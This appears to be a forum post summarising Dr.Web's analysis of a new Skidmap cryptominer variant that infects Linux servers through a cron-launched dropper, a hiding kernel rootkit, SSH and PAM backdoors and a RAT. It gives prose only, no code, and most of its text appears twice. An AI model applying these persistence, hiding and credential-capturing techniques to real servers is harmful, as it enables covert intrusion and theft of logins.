Man
Professional
- Messages
- 3,077
- Reaction score
- 614
- Points
- 113
Dr.Web researchers caught their honeypot in the form of a Redis server with disabled protection and uncovered a new modification of the rootkit that implements the installation of the Skidmap Trojan miner on compromised Linux machines.
During the year, from 10 to 14 thousand attacks were launched on the server every month, and recently the presence of the Skidmap malware was discovered, which is what analysts were counting on.
Despite the fact that five years have passed since the Trojan's appearance, the principle of its operation remains unchanged: it is installed in the system through the exploitation of vulnerabilities or incorrect software settings.
Skidmap has a certain specialization and is found mainly in corporate networks, since the greatest return on stealth mining can be obtained in the enterprise segment.
However, it was unexpected that in this case, cybercriminals used a new method to hide the miner's activity, and at the same time installed four backdoors at once.
Hackers added tasks to the system cron scheduler, in which a script was launched every 10 minutes that downloaded the dropper Linux.MulDrop.142 (or its modification - Linux.MulDrop.143).
This executable file checks the OS kernel version, disables the SELinux security module, and then unpacks the files of the Linux.Rootkit.400 rootkit, the Linux.BtcMine.815 miner, as well as the Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426 backdoors, and the Linux.BackDoor.RCTL.2 trojan into the system.
A distinctive feature of the dropper is that it is quite large, as it contains executable files for various Linux distributions.
In this case, about 60 files were sewn into the body of the dropper for different versions of Debian and Red Hat Enterprise Linux distributions, which are the most commonly installed on servers.
The noticed rootkit is made in the form of a malicious kernel module that hides the miner's activity by replacing information about the CPU load and network activity.
The purpose of the backdoors installed by the dropper as part of the observed attack is to save and send data on all SSH authorizations to the attackers, as well as to create a master password for all accounts in the system.
To expand their control over the compromised system, the attackers install the Linux.BackDoor.RCTL.2 RAT, which allows them to send commands to the compromised server and receive any data from it via a separate encrypted connection.
xmrig is installed as a miner, allowing you to mine a number of cryptocurrencies, the most famous of which is Monero.
Researchers note that detecting a miner covered by a rootkit in a server cluster is a rather non-trivial task.
In the absence of reliable information about resource consumption, the only thing that can suggest a compromise is excessive energy consumption and increased heat generation.
During the year, from 10 to 14 thousand attacks were launched on the server every month, and recently the presence of the Skidmap malware was discovered, which is what analysts were counting on.
Despite the fact that five years have passed since the Trojan's appearance, the principle of its operation remains unchanged: it is installed in the system through the exploitation of vulnerabilities or incorrect software settings.
Skidmap has a certain specialization and is found mainly in corporate networks, since the greatest return on stealth mining can be obtained in the enterprise segment.
However, it was unexpected that in this case, cybercriminals used a new method to hide the miner's activity, and at the same time installed four backdoors at once.
Hackers added tasks to the system cron scheduler, in which a script was launched every 10 minutes that downloaded the dropper Linux.MulDrop.142 (or its modification - Linux.MulDrop.143).
This executable file checks the OS kernel version, disables the SELinux security module, and then unpacks the files of the Linux.Rootkit.400 rootkit, the Linux.BtcMine.815 miner, as well as the Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426 backdoors, and the Linux.BackDoor.RCTL.2 trojan into the system.
A distinctive feature of the dropper is that it is quite large, as it contains executable files for various Linux distributions.
In this case, about 60 files were sewn into the body of the dropper for different versions of Debian and Red Hat Enterprise Linux distributions, which are the most commonly installed on servers.
The noticed rootkit is made in the form of a malicious kernel module that hides the miner's activity by replacing information about the CPU load and network activity.
The purpose of the backdoors installed by the dropper as part of the observed attack is to save and send data on all SSH authorizations to the attackers, as well as to create a master password for all accounts in the system.
To expand their control over the compromised system, the attackers install the Linux.BackDoor.RCTL.2 RAT, which allows them to send commands to the compromised server and receive any data from it via a separate encrypted connection.
xmrig is installed as a miner, allowing you to mine a number of cryptocurrencies, the most famous of which is Monero.
Researchers note that detecting a miner covered by a rootkit in a server cluster is a rather non-trivial task.
In the absence of reliable information about resource consumption, the only thing that can suggest a compromise is excessive energy consumption and increased heat generation.
